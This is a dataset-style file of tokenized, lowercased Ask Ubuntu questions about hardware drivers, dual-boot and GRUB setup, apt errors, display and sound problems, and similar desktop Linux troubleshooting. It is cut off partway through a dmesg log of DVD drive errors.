389477	edimax ew-7822uac not operating at superspeed	i was able to successfully build and install the drivers from https : //github.com/abperiasamy/rtl8812au_8821au_linux for this device . the problem is that while the device supports usb 3.0 superspeed , i ca n't get it to operate at that speed . this is because linux detects it as a usb 2.0 device . i have confirmed that it is plugged into a usb 3.0 port ( other devices plugged into that port gets usb 3.0 ) . when i boot into windows , the device is most definitely able to operate at usb 3.0 speeds ( i get wifi 802.11ac transfer speeds of ~40mb/s ) . is there some workaround to force the device to be detected as a usb 3.0 device as opposed to a usb 2.0 one ? here is the relevant output of lsusb -v : bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 1 single tt bmaxpacketsize0 64 idvendor 0x1d6b linux foundation idproduct 0x0002 2.0 root hub bcddevice 3.11 imanufacturer 3 linux 3.11.0-14-generic xhci_hcd iproduct 2 xhci host controller iserial 1 0000:19:00.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 2 whubcharacteristic 0x0009 per-port power switching per-port overcurrent protection tt think time 8 fs bits bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0503 highspeed power enable connect port 2 : 0000.0100 power device status : 0x0001 self powered bus 003 device 005 : id 7392 : a822 edimax technology co. , ltd device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x7392 edimax technology co. , ltd idproduct 0xa822 bcddevice 0.00 imanufacturer 1 realtek iproduct 2 802.11n nic iserial 3 123456 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 53 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 5 binterfaceclass 255 vendor specific class binterfacesubclass 255 vendor specific subclass binterfaceprotocol 255 vendor specific protocol iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x04 ep 4 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x85 ep 5 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 3.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 3 bmaxpacketsize0 9 idvendor 0x1d6b linux foundation idproduct 0x0003 3.0 root hub bcddevice 3.11 imanufacturer 3 linux 3.11.0-14-generic xhci_hcd iproduct 2 xhci host controller iserial 1 0000:19:00.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 31 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 bmaxburst 0 hub descriptor : blength 12 bdescriptortype 42 nnbrports 2 whubcharacteristic 0x0009 per-port power switching per-port overcurrent protection bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere bhubdeclat 0.0 micro seconds whubdelay 0 nano seconds deviceremovable 0x00 hub port status : port 1 : 0000.02a0 5gbps power rx.detect port 2 : 0000.02a0 5gbps power rx.detect binary object store descriptor : blength 5 bdescriptortype 15 wtotallength 15 bnumdevicecaps 1 superspeed usb device capability : blength 10 bdescriptortype 16 bdevcapabilitytype 3 bmattributes 0x00 wspeedssupported 0x0008 device can operate at superspeed ( 5gbps ) bfunctionalitysupport 3 lowest fully-functional device speed is superspeed ( 5gbps ) bu1devexitlat 1 micro seconds bu2devexitlat 4 micro seconds device status : 0x0001 self powered device status : 0x0002 ( bus powered ) remote wakeup enabled and here is the output from dmesg : [ 3078.998557 ] usb 3-1 : new high-speed usb device number 5 using xhci_hcd [ 3079.015410 ] usb 3-1 : new usb device found , idvendor=7392 , idproduct=a822 [ 3079.015422 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 3079.015428 ] usb 3-1 : product : 802.11n nic [ 3079.015433 ] usb 3-1 : manufacturer : realtek [ 3079.015438 ] usb 3-1 : serialnumber : 123456
389480	ubuntu on dell optiplex 755/760 - shall i expect any issues with graphics/audio/stability ?	i 'm looking for a computer for my friend who wants to have ubuntu on a cheap pc . i found some dells optiplex 755/760 that fit the price but i wonder if i should expect any issues with graphics ( intel gma 3100/4500 ) , onboard audio , chipset etc or is ubuntu working right after the installation ? i do not yet have this computer so using a livecd will not work ; - ) and aside question : will the ubuntugnome/xubuntu run smooth on such hardware ? my friend especially wants to watch youtube movies and browse simple websites .
389481	how to add scrollbar buttons to default cinnamon theme ?	my installation of cinnamon 2 on ubuntu 13.10 has no up or down scrollbar buttons . i 've tried many suggestions such as this one , but none work . how can up and down scrollbar buttons be added to the default theme ? ( i can change themes but like the default theme and would like to know how to add scrollbar buttons to any theme )
389482	trying to install ubuntu on a acer aspire one aod255e	hi i am currently running windows 7 starter on my acer aspire one aod255e netbook and i wanted to get rid of windows and use ubuntu instead . i created an bootable flash drive with the latest version of ubuntu using unetbootin and when i boot from the flash stick i get a black screen with a blinking cursor and nothing else . i have to hold down the on button to shut the computer off . any advice out there ... just keep using windows ? : (
389487	guake disappears after being minimized	i 'm having a problem with guake . when i accidentally use the hotkey to minimize and the focus is on guake , it minimizes , this is not the problem , the problem is that i do n't know how to recover it . if i execute guake nothing happens , i have to kill the process to be able to use it again . killing the process also means losing all the previously opened guake tabs , processes running in them , etc .
389490	no sound from external speakers/headphones ( jack )	i 've got constant problem , after instaling ubuntu 13.10 . i get no sound from the audio jack ( speakers , headphones etc ) but my internal speakers work right , playing sound as they should . tried many `` workarounds '' a found here , but not even one seems to fix the problem ... my laptop is asus k55vm , if you need any command-output just ask , and i will post it ( due to being completely linux-noob , i do n't want to post any nonesense ) .
389493	virtual box ubuntu guest mounting sshfs within shared folder	i have windows 7 host and ubuntu as guest ( makeshift while our it dept repairs my normal linux box ) . i have setup a virtualbox shared folder and it correctly shares files between the two systems . i 've also mounted a folder with sshfs in the shared folder . it works as expected in guest-ubuntu , but in host-windows i ca n't see anything in the folder that should have sshfs mounted within it . i even retried mounting with -o allow_other and i 've uncommented user_allow_other in /etc/fuse.conf . it mounts without error or warning messages , but the directory still does not show up in windows . i thought maybe it was the mounted file permissions , but it looks like they 're all -rwxr-xr-x and the folder itself is drwxr-xr-x . these look like should be sufficient to have the files at least visible to outside access , even if there is no write permission granted . is there something immediately obvious that i 'm not doing , because i ca n't think of what else i need to do to make this directory visible to my windows host . ( thanks to any in advance ! )
389495	âwaited for * || true but it was n't there â apt error	i have run into an error with apt that seems to occur every time i update . the error outputs every time i try to install something via apt . here is the output ; e : waited for /usr/sbin/dpkg-preconfigure -- apt || true but it was n't there e : failure running script /usr/sbin/dpkg-preconfigure -- apt || true running version 12.04.3
389498	nouveau problem starting ubuntu 13.10	recently , i 've installed ubuntu 13.10 in a asus vivobook s551lb with a nvidia geforce 740m . every time when i start the labtop , an error appears : [ 13.803205 ] nouveau e [ device ] [ 0000:04:00.0 ] unknown chipset , 0x108120a1 [ 13.803246 ] nouveau e [ drm ] failed to create 0x8000080 , -22 do you know what i have to do to fix this ? thanks in advence
389504	opening sublime text 2 from terminal problems	when i run the command sudo sublime from my terminal , it opens the program but will not allow me to run any other commands in my terminal until i close sublime text . this does n't work because i 'm trying to run tests from the terminal while making changes to my project on sublime text . right after sublime text opens from the terminal , i get this error : ( sublime:3522 ) : ibus-warning ** : the owner of /home/mitch/.config/ibus/bus is not root ! i have tried figuring out what that warning means but have gotten no where . i 'm very new to ubuntu and appreciate any insights .
389506	easy method to encrypt a 500gb portable usb drive with true crypt ?	i have a 500gb portable usb drive with about 111gb free space . i followed the steps to make a container on the drive and set the container size to 500gb . i selected aes+twofish+serpent for the encryption and ntfs as the format . when i click the format button it starts to format but indicates the process will take 26+hours . is there a faster/easier way to do this ? or is the wait time just a consequence of creating such a large file ?
389514	problem with openjre on ubuntu	so , i installed openjre from the ubuntu software center , and then i click on minecraft.jar and select `` open with openjdk java 7 runtime '' , and nothing happens . then i go to terminal and type ( while in the downloads directory ) java -xms1g -xmx1g -jar minecraft.jar . it gives me error : exception in thread `` main '' java.awt.headlessexception at java.awt.graphicsenvironment.checkheadless ( graphicsenvironment.java:173 ) at java.awt.window. < init > ( window.java:546 ) at java.awt.frame. < init > ( frame.java:419 ) at javax.swing.jframe. < init > ( jframe.java:218 ) at net.minecraft.bootstrap.bootstrap. < init > ( bootstrap.java:45 ) at net.minecraft.bootstrap.bootstrap.main ( bootstrap.java:378 ) please help .
389523	screensaver lock wo n't release	i have my ubuntu 12 desktop set to lock after a time period -- this works fine , but when i go to unlock it sometimes ( usually only after leaving it locked overnight ) wo n't come out of the locked state -- the lock dialog goes away but it still shows the image from the locked screen ( usually a picture from variety , which i use as a background switcher ) . i can ctrl-alt-f1 into a command prompt , and the processes seem to be fine , so i think the system is fine , it 's just the lock app ( or whatever it is ) that might be screwed up . how can i diagnose this ? is there a kill command i can issue from the command prompt to disable the lock view ?
389524	how to upgrade ubuntu 12.04 in a dual-boot system with 13.10 cd ?	i have windows 7 and ubuntu 12.04 on a dual-boot setup , across a raid 0 ( 2x 300gb ) . when i insert the ubuntu cd it says i can : install alongside get rid of both something else when i go to `` something else '' it shows i have the following partitions : linux1 ext4 60gb ubuntu 12.04 linux5 swap 3.2gb linux1 ext4 60gb ubuntu 12.04 linux5 swap 3.2gb win7 ntfs 530gb windows 7 loader win7 ntfs 530gb windows 7 loader edit : i did not accidently paste the above twice- i think i see `` double '' because of the raid 0 setup . what should i do at this screen if i want to simply replace 12.04 with 13.10 ( fresh install- dont need to keep anything from 12.04 ) ? the bit which worries me is that there is nothing for the `` mount point '' column and i dont want to mess around with my dual-boot config by setting a mount point which i do n't current have ? ? help ?
389525	ca n't access ubuntu or reinstall it on macbook pro	i have a problem with my ubuntu installation on a macbook pro . i ca n't figure out how to solve this . the problem is that i 've installed ubuntu 13.04 and i ca n't access my ubuntu os because the disk is locked by a passphrase that i ca n't remember . so i figure i try reinstall ubuntu on it and choose not to have a passphrase . that was not so easy as i thought . the macbook pro wo n't boot up the usb thumb drive with the intel x86 ubuntu 13.04 . and when i tried to install mac os x , it did n't work that either ( no other info there ) . something is really wrong here and i ca n't figure out how to solve this issue . i can access the grub 2.0 but i do n't know if i can do something in there , enter a command for partition the disk or do something else . i do n't want to have mac os x and ubuntu on a different partition . i only want ubuntu on the disk running so what can i do ?
389526	does data save while trying ubuntu 13.10 booted through efi on macbook pro retina ( late 2013 )	im trying to make safe and secure bitcoin paper wallets and the only ubuntu live cd that will work is the 13.10 version ( ubuntu 12.04 wont boot at all matter what on my new macbook retina that has not been taken online yet ) . is `` trying out '' ubuntu 13.10 on a usb drive through efi as safe and secure as ubuntu 12.04 ? will it save my files/data at all ? cause that 's exactly what i would n't want . my macbook pro will only boot ubuntu through `` efi '' mode while holding alt when starting up the laptop , there is 2 options , windows , and efi . when i click the windows boot option it wo n't detect that there is ubuntu on that usb so ubuntu will only start up and work while booting through efi . what 's the difference with efi btw ? and when it loads up the screen , its so small that you can barely see your cursor . how do i fix the size of the screen layout as well ? ? thanks , sky
389533	help finding/installing kernel headers-3.11.0-14-generic	i just switched to ubuntu 13.10 and i 'm trying to install vmplayer in order to run windows based applications . the installation went good but when i try to open vmplayer it displays an error saying that several modules must be compiled and loaded into the running kernel . specifically is asking for kernel headers-3.11.0-14-generic how can i locate this file and/or install it properly ? a step by step answer will be much appreciated ... thanks guys !
389536	which version of ubuntu is safer ?	is ubuntu 13.10 safer then ubuntu 12.04 ? what 's the difference ? and why does n't ubuntu 12.04 boot on the new macbook retinas ?
389537	swap left and right alt on apple aluminum keyboard in 12.04	i am a total newbie and i use ubuntu as a web development environment ( drupal , wordpress ) under virtualbox : by far the best solution in my experience . for comfort and efficiency 's sake , even if it means losing some other system functionality , i wish i was able to swap the functions of the physical left and right alt keys . i have worked on an apple keyboard for ages and have a terrible time changing the mapping of the lower row keys , it kills my productivity when coding . i have dabbled a bit with a .xmodmappings file in my home directory , inspired by this experiment , to no avail : http : //www.chrisamiller.com/blog/2012/05/11/remapping-your-macbooks-keyboard-in-ubuntu-12-04 i have guessed that the key code for the left alt key on a multilingual apple aluminum keyboard was 58 , but this is a guess from looking at somewhat dodgy screenshots . here is the code in my .xmodmappings file : ! clean most of the modifiers clear mod4 ! keycode 58 is the left alt key , super_r is the right alt by default keycode 58 = super_r add mod4 = super_r i have managed to make my command key to act like the control key , using the ui under keyboard layout options > alt/win key behavior > control is mapped to win keys . but this gets wiped by the xmodmappings modifier . you would be kind to show me the simplest route to obtaining such a result . let me also know if there is an easy way i could dump out the current key code mapping for this keyboard : i am sure it would help me get advice if i pasted it back here . thank you ! ! !
389538	do i have ubuntu on my computer ?	earlier i had ubuntu and windows in my computer . it gave an option to choose the operating system after boot . i dont remember if i removed ubuntu when i upgraded to windows8 , but i dont get the option now to choose os . how can i check if ubuntu is still there in my system ? and if its still there , how can i activate the option to choose os after boot ?
389540	how do i dual boot after installing ubuntu ? i keep getting a grub rescue problem	hi i just installed ubuntu 12.04.3 on mt dell inspiron that was running windows 7 . i had trouble installing it at the start so i used the sudo apt-get remove dmraid command to install alongside window . when i restarted the machine i got the error : no such device : 4cfe3cc0-370e-48ed-82cd-7cd2ca7a0414 . grub rescue > message . can you please help me fix my machine so it can boot either windows or ubuntu from the hard disk ? http : //paste.ubuntu.com/6558943/ < < boot repair url thank you
389541	how can i add a dropbox folder option under my `` places '' in nautilus	like windows , when you download dropbox it places a folder in the library list . i 'm wondering if i 'm able to similarly add dropbox under `` places '' . thank you in advance for your help .
389543	using `` sata controller '' to add extra ports with mdadm software raid to create a raid 5 array	here is the set up ... . ubuntu 12 lts , plex.. ect.i am looking on setting up a raid 5 using 4 2tb disks to create 6tb of space with a fail safe . one thing i have had a thought about which i am unsure thus was wondering if the gurus here had an answer too , is the use of a sata controller with mdadm software raid ... . would buying a 4 port pci sata 3 controller to add more sata ports to the system work with mdadm to create a raid 5 array ? this is opposed to buying a 4 port fakeraid controller with raid 5 in its little bios . all the best guys ! to add , my motherboard is from around 2008 and i confident it dies not have onboard riad
389544	how do i make the screen size bigger in ubuntu 13.10 in live usb mode ?	i 'm trying to make secure files , by only efi booting `` try ubuntu '' 13.10 on a macbook pro through a live usb , however the screen size is small every time i boot it up . this does n't happen when i boot the same usb on my older white macbook . how do i make the whole screen setup appear bigger ? thanks , sky
389546	ibus japanese input anthy does not work in chrome after upgrade to ubuntu 13.10 - what 's wrong ?	my chrome version is 31.0.1650.63 . after the upgrade to 13.10 i struggled to get the anthy ( ibus ) input back and working . i thought i had at last but now i discovered that it works pretty much everywhere in ubuntu , including skype , which was a problem discussed in another thread , but not in chrome . what is happening is that i can select input method anthy , the little icon appears in the status bar , but it is all latin letters that are being produced when i am in chrome . without having to change anything , i can type japanese in the dash , libreoffice , etc . - even in firefox it is no problem . only chrome ! i do not know why . how to resolve this ? if there is anybody out there who does , please let me know .
389549	trying to overwrite 'file ' , which is also in package '* ' , how to solve ?	i 'm not able to update anything . i 'm on 13.10 . when i try to install updates i get this : dpkg : error processing /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core8 3.0.1-1ubuntu5~ppa0 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/librhythmbox-core7_3.0.1-0~13.10~ppa1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does anyone have a solution ?
389551	gui does n't work , flashing underscore on boot	ubuntu version is 12.04.3 . my computer is a asus laptop , ul30jt with a nvidia graphics card . i previously had problems getting the graphics drivers to work , but i resolved that previously today . afterwards i attempted to reboot and it worked fine , then i installed glfw and afterwards it wo n't start the gui after restarting . i am not completely sure , but i think it was after i installed glfw , and it 's dependencies xorg-dev and libglu1-mesa-dev . pressing ctrl + alt + f1 brings up the terminal where i can login . i tried running for example glxinfo , which just prints : error : unable to open display . i tried running glxinfo previously , when i was trying to figure out my driver problems nad it printed .. information of some kind . ( different from this error message , i dont remember what it was . ) i have been using ubuntu for about 4 months , so i am not terribly experienced with different useful commands . i have looked at this without finding anything useful . startx gets a fatal error : fatal server error : no screens found sudo service lightdm start or sudo start lightdm just takes me back to the blinking underscore , and pressing ctrl + shift + f1 takes me back to the terminal . i tried running sudo apt-get install nvidia-current ( which installed a bunch of stuff ) and then rebooting which had no effect . this also happened the last time i tried to install glfw , i do n't know if it is the actual cause , but it has happened after attempting to install glfw twice in a row now . the last time i got the error message `` could not write bytes broken pipe '' , however this time i do n't get that . i fixed it by reinstalling ubuntu , but it would be painful to have to do that again .
389552	how can i force the backlight to never turn off ?	i 'm using ubuntu 13.10 with gnome 3.10 on a packard bell easynote-tk37 ( intel gm45 express graphics ) , and i 've had significant problems with my backlight . initially , upon booting the backlight would not turn on , but if i shone a light at the screen i could see that it was being drawn correctly . i solved the issue using the commands in the following post : http : //stackoverflow.com/questions/8380688/linux-ubuntu-11-04-install-backlight-wont-turn-on however , this did n't completely solve all issues . when the laptop sleeps , it 's backlight turns off . this can be mitigated by setting the timer very high for sleeping , but when i lock the laptop the backlight still turns off , and will not turn back on . is there any way to force the backlight to remain on permanently ? caffeine seems to fit that requirement , but it is n't working for me , at least on the current version of ubuntu . a bash script would be extremely helpful , since i could add that to my backup script for when i have to reinstall ubuntu . if any clarification is needed please leave a comment below . thanks .
389555	with the download from the internet my screen just goes black when i restart the computer	burned files to disc , put in disc , did stuff , restarted computer , restarts and the ... purple screen comes up and goes away , screen stays black forever ( literally ) but make a blip noise a bit after the purple goes away .
389556	can i upgrade to 13.10 within 12.04 lts	i want to install the 12.04 lts version ( because it has windows installer instead of having to burn to disk and all the other stuff ) , but i want to use 13.10 because it 's newer . but can i dual-boot 12.04 lts to another hard drive hooked up to my 32-bit computer and then inside of 12.04 lts upgrade to 13.10 ?
389557	how to stop shotwell from scanning entire disk on startup ?	every time i run shotwell 0.15 ( ubuntu 13.10 ) , it starts scanning my entire hard drive ( according to ~/.cache/shotwell/shotwell.log ) and displays `` updating library . '' is there a way to prevent this full-drive scan at startup ? all my photos are in one directory tree and there 's no need to scan elsewhere . i checked the shotwell manual but did n't find a solution . i tried invoking shotwell with the -- no-runtime-monitoring option , but this made no difference . i deleted ~/.cache/shotwell and ~/.locale/share/shotwell and reran shotwell , but this made no difference . this thread asked the same question in 2012 , but it did not provide a solution : http : //ubuntuforums.org/showthread.php ? t=2087882 this bug sounded relevant at first but seems to be about a different issue : http : //redmine.yorba.org/issues/3568 thanks for any insights .
389559	wi-fi disconnects randomly in ubuntu 13.10 dell computer	my wifi disconnects randomly and the only way i know how to get it back on is to restart the computer . this has been happening 2-4 times per day since i installed 13.10 . does anyone know what the problem is or had this happen to them ?
389560	nasm , unable to open file	nasm keeps giving me error : nasm : fatal : unable to open output file `boot.o' and none of the files have errors because i am following the james molloy 's kernel development tutorial . it wo n't work on ubuntu or raspbian ( raspi os ) with this and tiberiu chibici 's osdev tutorials . does anyone know how ?
389561	`` the eclipse executable launcher was unable to locate its companion launcher jar . '' how can this be solved ?	i am trying to install eclipse for java ee but everytime i try to run eclipse using the terminal it will give an error of the eclipse executable launcher was unable to locate its companion launcher jar . the content of my /usr/bin/eclipse is # eclipse startup script # jpackage project < http : //www.jpackage.org/ > # $ id $ eclipse_opts= '' '' vm_opts= '' '' # source system prefs if [ -r /etc/eclipse.conf ] ; then . /etc/eclipse.conf fi # source user prefs if [ -r $ home/.eclipserc ] ; then . $ home/.eclipserc fi # set data dir if -data was n't given . if ! echo $ @ | grep '\-data ' > /dev/null 2 > & 1 & & [ -n `` $ user_dir '' ] ; then eclipse_opts= '' $ eclipse_opts -data $ user_dir '' fi # find our jvm . # if [ ! -x `` $ javacmd '' -a -r /usr/share/java-utils/java-functions ] ; then # . /usr/share/java-utils/java-functions # set_javacmd # fi # javacmd= '' /usr/lib/j2re1.5-sun/bin/java '' javacmd= '' /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java '' # set jvm if -vm was n't given . if ! echo $ @ | grep '\-vm ' > /dev/null 2 > & 1 & & [ -n `` $ javacmd '' ] ; then eclipse_opts= '' $ eclipse_opts -vm $ javacmd '' fi # set jvm args if -vmargs was n't given . this needs to be the last option . if ! echo $ @ | grep '\-vmargs ' > /dev/null 2 > & 1 & & [ -n `` $ vm_args '' ] ; then vm_opts= '' -vmargs $ vm_args '' fi # if [ -w $ user_dir/.metadata/.config/platform.cfg ] ; then # perl -p -i.bak -e 's|^site\. [ 0-9 ] *\.list\. [ 0-9 ] *= . *\n||g ; ' $ user_dir/.metadata/.config/platform.cfg # fi /home/user/development/eclipse/eclipse $ eclipse_opts $ @ $ vm_opts i am new to installing eclipse for java ee and i have no idea what the error is all about . how do you think this can be solved guys ? thanks in advance .
389562	is possible to just copy my sync-ed ubuntu one directories to one installation to another ?	i 'm moving an xp user to another less chronic xp box . i have copied over the data so i do n't want ubuntuone to download or upload everything , i just want it to keep what 's on the server up to date with the specified directories . how do i make sure this happens ? and is this any different on linux , as i 'm about to do something similar with a new install of netrunner .
389563	setup cisco rv042 router foe vpnc	i can find lots of instruction on how to configure the vpnc client but , how do i configure the router for vpn access . i have a ubuntu 12.04 lts client with network-manager-vpnc installed . i want to setup single user or a group but i have no idea what settings vpnc requires on the router . please walk me through the process of setting up the router and the client . nothing i try seems to work . thanks ! !
389564	is it possible to extract desktop environments from an ubuntu derivative distro to an installed ubuntu installation	and if you can how is it accomplished ? i would like to know if this is possible to accomplish from a live usb to an install without internet ?
389565	`` configuring grup-pc '' what should i choose ?	i have a raid 0 ( 2x 300gb drives ) with windows 7 and ubuntu 13.10 ( 58gb ext4 partition , with 5gb swap partition ) on them . i have just managed to get my dual boot working . however , as i went to update some software in ubuntu software centre the `` configuring grub-pc '' window popped up and shows the following : /dev/sda ( 300069mb ; wdc_wd3000glfs-01f8u0 ) /dev/sdb ( 300069mb ; wdc_wd3000glfs-01f8u0 ) /dev/sdc ( 2000000mb ; xxxxxxxxxxxxxxxxxxxx ) ( i know this one is just my external sata drive ) /dev/mapper/isw_dcgidgaidc_win7 ( 536871gb ; isw_dcgidgaidc_win7 ) /dev/mapper/isw_dcgidgaidc_linux ( 63257gb ; isw_dcgidgaidc_linux ) ( looks like my ext4 +swap ) /dev/mapper/isw_dcgidgaidc_linux2 ( 58012gb ; isw_dcgidgaidc_linux ) ( just my ext4 ) which of these should i tick to update/install grub on ? ? edit : if i do : df | grep / $ it says : /dev/mapper/isw_dcgidgaidc_linux2
389568	identifying correct connection device when reading ifconfig output	i 'm trying to get the mac address of my computer . i 've run ifconfig like the person in this question , and i get information about eth0 , eth1 and lo . the hwaddr of eth0 and eth1 are different , so i need to work out which one i should look at . how do i determine which one i should be looking at ? ( normally i 'd paste in the output of ifconfig , but i suspect some of the output is private )
389570	telling alien to install under /usr/lib instead of /usr/lib64	i 'm trying to convert mysql 5.0 rpm 's from oracle ( specifically , http : //downloads.mysql.com/archives/get/file/mysql-shared-5.0.96-1.glibc23.x86_64.rpm ) from .rpm to .deb in order to install them on ubunty 12.04 x64 ( yes i know it 's old , i need it ) . `` alient -- scripts -- to-deb mysql-shared-5.0.96-1.glibc23.x86_64.rpm '' creates an installable .deb file but the libraries it contains end up under /lib64 instead of /lib , and /lib64 is n't in the standard ldconfig search path . i can do work arounds like adding symlinks from /usr/lib to /usr/lib64/* or add `` /usr/lib64 '' to a file under /etc/ld.so.conf.d , but i think the cleanest solution would be to tell alien to put the files in the right place . i tried to follow the instructions in /usr/share/doc/alien/gendiff.txt and rename the directory but dpkg-buildpackage ca n't grok it . what else can i do ? is there a way to tell alien to install the files under /usr/lib instead of under /usr/lib64 ? thanks .
389571	errors when installing 12.10 updates	i run ubuntu 12.10 when i attempt to install updates i get the following message : error : brokencount > 0 ' . how can i fix this ?
389574	dvd optical drive not mounting	friends , i am a complete noob to the linux world . i just installed 12.04 lts version . everything is working fine and i love it . there is one small problem . i insert my dvd into the optical drive . the disk is spinning . however , i am not able to see the device mounting . the optical drive is not listed under the devices tab in nautilus . i went through similar questions and thus , ran the dmesg | grep sr0 this is my result -- [ 811.126153 ] sr 1:0:0:0 : [ sr0 ] [ 811.126159 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 811.126171 ] end_request : i/o error , dev sr0 , sector 64 [ 811.126176 ] buffer i/o error on device sr0 , logical block 8 [ 819.714191 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 819.714197 ] sr 1:0:0:0 : [ sr0 ] [ 819.714202 ] sr 1:0:0:0 : [ sr0 ] [ 819.714208 ] sr 1:0:0:0 : [ sr0 ] [ 819.714214 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 819.714225 ] end_request : i/o error , dev sr0 , sector 64 [ 819.714229 ] buffer i/o error on device sr0 , logical block 8 [ 828.302248 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 828.302253 ] sr 1:0:0:0 : [ sr0 ] [ 828.302257 ] sr 1:0:0:0 : [ sr0 ] [ 828.302263 ] sr 1:0:0:0 : [ sr0 ] [ 828.302270 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 828.302281 ] end_request : i/o error , dev sr0 , sector 64 [ 828.302285 ] buffer i/o error on device sr0 , logical block 8 [ 836.890310 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 836.890316 ] sr 1:0:0:0 : [ sr0 ] [ 836.890321 ] sr 1:0:0:0 : [ sr0 ] [ 836.890327 ] sr 1:0:0:0 : [ sr0 ] [ 836.890333 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 836.890345 ] end_request : i/o error , dev sr0 , sector 64 [ 836.890350 ] buffer i/o error on device sr0 , logical block 8 [ 845.478334 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 845.478339 ] sr 1:0:0:0 : [ sr0 ] [ 845.478343 ] sr 1:0:0:0 : [ sr0 ] [ 845.478349 ] sr 1:0:0:0 : [ sr0 ] [ 845.478355 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 845.478366 ] end_request : i/o error , dev sr0 , sector 64 [ 845.478370 ] buffer i/o error on device sr0 , logical block 8 [ 854.066484 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 854.066496 ] sr 1:0:0:0 : [ sr0 ] [ 854.066502 ] sr 1:0:0:0 : [ sr0 ] [ 854.066508 ] sr 1:0:0:0 : [ sr0 ] [ 854.066515 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 854.066528 ] end_request : i/o error , dev sr0 , sector 64 [ 854.066534 ] buffer i/o error on device sr0 , logical block 8 [ 862.654420 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 862.654426 ] sr 1:0:0:0 : [ sr0 ] [ 862.654430 ] sr 1:0:0:0 : [ sr0 ] [ 862.654436 ] sr 1:0:0:0 : [ sr0 ] [ 862.654442 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 862.654453 ] end_request : i/o error , dev sr0 , sector 64 [ 862.654458 ] buffer i/o error on device sr0 , logical block 8 [ 871.242441 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 871.242446 ] sr 1:0:0:0 : [ sr0 ] [ 871.242451 ] sr 1:0:0:0 : [ sr0 ] [ 871.242457 ] sr 1:0:0:0 : [ sr0 ] [ 871.242463 ] sr 1:0:0:0 : [ sr0 ] cdb : [ 871.242474 ] end_request : i/o error , dev sr0 , sector 64 [ 871.242478 ] buffer i/o error on device sr0 , logical block 8 [ 879.830551 ] 